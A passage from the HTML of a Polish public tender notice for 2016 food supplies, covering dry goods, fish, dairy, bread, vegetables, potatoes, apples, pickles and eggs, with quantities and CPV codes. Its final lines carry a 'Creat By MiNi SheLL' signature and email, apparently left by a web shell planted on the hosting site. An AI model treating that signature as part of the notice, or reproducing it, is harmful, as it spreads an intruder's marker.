34.	Papryka konserwowa (po odcieku nie mniej niż 320g lub proporcjonalnie)		min 670g
max 900g	kg	268		
35.	Zupa grzybowa w proszku
(typu Winiary lub równoważna)		min 45g
max 100g	kg	      120		
36.	Zupa grochowa w proszku		min 45g
max 100g	kg	11,25		
37.	Aromat		min 10g
max 20g	kg	4		
38.	Budyń śmietankowy, waniliowy, malinowy, czekoladowy		min 40g
max 50g	kg	315		
39.	Kisiel wiśniowy, truskawkowy, cytrynowy, żurawinowy		min 40g
max 50g	kg	180		
40.	Słodzik 100 tabletek		min 4g
max 5g	kg	2,25		
41.	Rosołki drobiowe, wołowe		min 60g
max 100g	kg	48		
42.	Ocet		min 500ml
max 1l	l	20		
43.	Przyprawa do zup w płynie		min 1kg
max 1,50lkg	kg	110		
44.	Musztarda delikatesowa		min190g
max 250g	kg	140		
45.	Kwasek cytrynowy		min 20g
max 50g	kg	16		
46.	Majonez skład: olej roślinny, żółtko jaj nie mniej niż 6%, ocet, musztarda, kwas cytrynowy		min 400ml
max 620ml	l	240		
47.	Ziele angielskie		min 15g
max 50g	kg	4,50		
48.	Makaron z mąki makaronowej		       min 500g
       max 1000g	kg	1700		

49.Makaron z semoliny 100% typu Lubella lub równoważny		min 500g
max 1000g	kg	100		
50.Papryka słodka w proszku		min 20g
max 50g	kg	1,00		
51.Ketchup  typu Włocławek lub równoważny (skład:100g produktu uzyskane z co najmniej 163g pomidorów lub proporcjonalnie)
		min 480g
max 500g	kg	150		

52.Ryż paczkowany, długoziarnisty, gat. I 		min 1kg
max 3 kg	kg	900		

53.Mąka ziemniaczana paczkowana		min 500g
max 1 kg	kg	300		

54.Mąka pszenna paczkowana typ 480		min 1kg
max 3 kg	kg	4000		
55.Kasza gryczana palona paczkowana gat. I		min 500g
max 5kg	kg	300		
56.Kaszka ml-ryżowa, na mleko nie mniej niż 38% mleko modyfikowane, nie mniej niż 32% odtłuszczone mleko w proszku 		min 230g
max 500g	kg	4,60		
57.Kasza manna paczkowana		min 1kg
max 3kg	kg	320		
58.Kasza jęczmienna średnia paczkowana		min 1kg
max 3 kg	kg	200		
59.Płatki owsiane górskie paczkowane (do zalewania wrzątkiem)		 min 500g
max 1 kg	kg	150		
60.Olej rzepakowy 		min 1l
max 3l	l	750		
61.Olej rzepakowy 		
 0,50 l	l	350		
62.	Miód wielokwiatowy typu Tymbark lub równoważny ,kubek plastikowy (nie torebka)		min 25g
max 30g	kg	200		
63.	Kleik ryżowy na mleko (skład: mąka ryżowa 100%, witamina B1)		min 170g
max 200g	kg	8,50		
64.	Suchary delikatesowe		min 290g
max 500g	kg	5,80		
65.	Listki waflowe bez cukru dla diabetyków		min 32g
max 100g	kg	34,20		

66.Wafelki bez cukru dla diabetyków		min 40g
max 100g	kg	48		
67.Herbatniki lekkie bez cukru dla diabetyków		min 73g
max 120g	kg	80		
68.Biszkopty paczkowane		min 250g
max 500g	kg	225		
69.Smalec paczkowany		min 200g
max 500g	kg	100		
70.Grzyby suszone podgrzybki,     nie krojone 		min 500g
max 1kg	kg	3		
71.Jabłka suszone		min 500g
max 2kg	kg	12		
72.Śliwki bez pestek suszone		min 500g
max 2kg	kg	15		
73.Galaretka truskawkowa		min 70g
max 100g	kg	112,50		
74.Dżem bez cukru: czarna porzeczka, wiśnia ,truskawka, brzoskwinia, malina, zawartość owoców  nie mniej niż 50%, fruktoza nie mniej niż 28% 		min 190g
max 250g	kg	475		
75.Czosnek suszony		min 20g
max 50g	kg	1		
76.Margaryna zwykła kostka		min 250g
max 500g	kg	400		
77.Masło roślinne kostka		min 250g
max 500g	kg	200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.85.00.00-1, 15.80.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa ryb i przetworów rybnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część: B

1.	Filet z ryb mrożonych panga 		---	kg	800		
2.	Filet z ryb mrożonych mintaj ( nie z dostaw chińskich)		---	kg	100		
3.	Filet z ryb mrożonych morszczuk ( nie z dostaw chińskich)		---	kg	100		
4.	Śledzie płaty 		---	kg	100		
5.	Makrela wędzona		---	kg	100.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.22.00.00-6, 15.20.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawa artykułów mleczarskich.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część: C

1.	Mleko  pasteryzowane, homogenizowane, (zawartość tłuszczu 2%, folia) 		min 3 l
max 5 l	l	22 500		
2.	Masło Extra, 
(zawartość tłuszczu nie mniej niż 82% , paczkowane)		min 200g
max 250g	kg	3 000		
3.	Serek homogenizowany (smak waniliowy, truskawkowy, malinowy)		min 150g
max 170g	kg	240		
 4.	Ser biały, twarogowy, półtłusty, paczkowany, terminizowany		min 250g
max 1kg	kg	1400		
 5.	Serek typu kanapkowy lub równoważny, 
(serek twarogowy, kremowy, naturalny, terminizowany, zawartość tłuszczu nie mniej niż 12%)		min 100g
max 140g	kg	240		
 6.	Serek topiony kremowy (terminizowany, zawartość tłuszczu nie mniej niż 27%)		min 50g
max 150g	     kg	600		
7.	Ser żółty pełnotłusty  typu Gouda lub równoważny
( zawartość tłuszczu nie mniej niż 26% )		---	kg	300		
8.	Śmietana homogenizowana, (zawartość tłuszczu 18%)		min 200g
max 400g	kg	360		
9.	Jogurt naturalny (zawartość tłuszczu nie mniej niż 2%)		min 150g
max 500g	kg	280		
10.	Jogurt owocowy z kawałkami owoców,
(skład: nie mniej niż 9% owoców, sok z owoców, cukier, mleko w proszku odtłuszczone)		min 125g
max 170g	kg	675.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3, 15.51.00.00-6, 15.54.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Dostawa pieczywa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część: D

1.	Chleb pszenny, krojony, paczkowany		min 600g
max 1kg	kg	14 900		

2.	Chleb razowy, krojony, paczkowany		min 400g
max 600g	kg	400		

3.	
Bułka pszenna		min 40g
max 60g	kg	2000		
 
 4.
	Bułka tarta, paczkowana		min 500g
max 1kg	kg	400		

5.
	Drożdże		min 250g
max 1kg	kg	50		
6.
	Żurek		min 1l
max 5 l	     l	400		

7.
 	Rogal maślany		min 80g
max 100g	kg	600		

8.
 	Angielka krojona, paczkowana		min 300g
max 500g	kg	3360		

9.
	Chałka		min   300g
max  500g	kg	350.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Dostawa warzyw.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część: E

 1.	Buraki		---	kg	2500		
 2.	Botwina		       ---	pęczki	  350		
 3.	Brukselka		---	kg	  200		
  4.	Brokuły		---	szt	 1000		
  5.	Cebula		---	kg	   1000		
  6.	Czosnek		---	szt	  100		
7.	Fasolka szparagowa		---	kg	   50		
8.	Kalafior		---	szt	  900		
9.	Koperek		---	kg	  100		
10.	Kapusta biała		---	szt	2500		
11.	Kapusta czerwona		---	kg	  350		
12.	Kapusta pekińska		---	kg	  200		
13.	Kapusta włoska		---	szt	  500		
13.	Marchew		---	kg	   5500		
14.	Ogórek zielony		---	kg	   1000		
15.	Pietruszka		---	kg	   1500		
16.	Nać pietruszki		---	kg	  160		
17.	Por		---	kg	  200		
18.	Pomidory		---	kg	   4500		
19.	Papryka czerwona		---	Kg	    50		
20.	Papryka żółta		        ---	kg	    50		
  21.	Rzodkiewka		---	pęczki	  450		
  22.	Sałata		---	szt	   5500		
  23.	Seler		---	kg	   1000		
  24.	Szczypiorek		---	pęczki	 500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Dostawa ziemniaków.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część: F

1.	Ziemniaki jadalne, klasa I
(pakowane w workach)		min 10 kg
max 25 kg	kg	37 000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.21.21.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Dostawa jabłek.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część: G


1.	Jabłka klasa I
( pakowane w skrzynki plastikowe lub drewniane)		min 10 kg
max 20 kg	kg	4500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.00.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Dostawa kapusty kiszonej i ogórków kiszonych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część: H

1.	Kapusta kiszona		---	kg	1 300		
2.	Ogórek kiszony		---	kg	700.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Dostawa jaj.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część: I

1.	Jajka kurze świeże klasa L --- szt 58 000..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.14.25.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com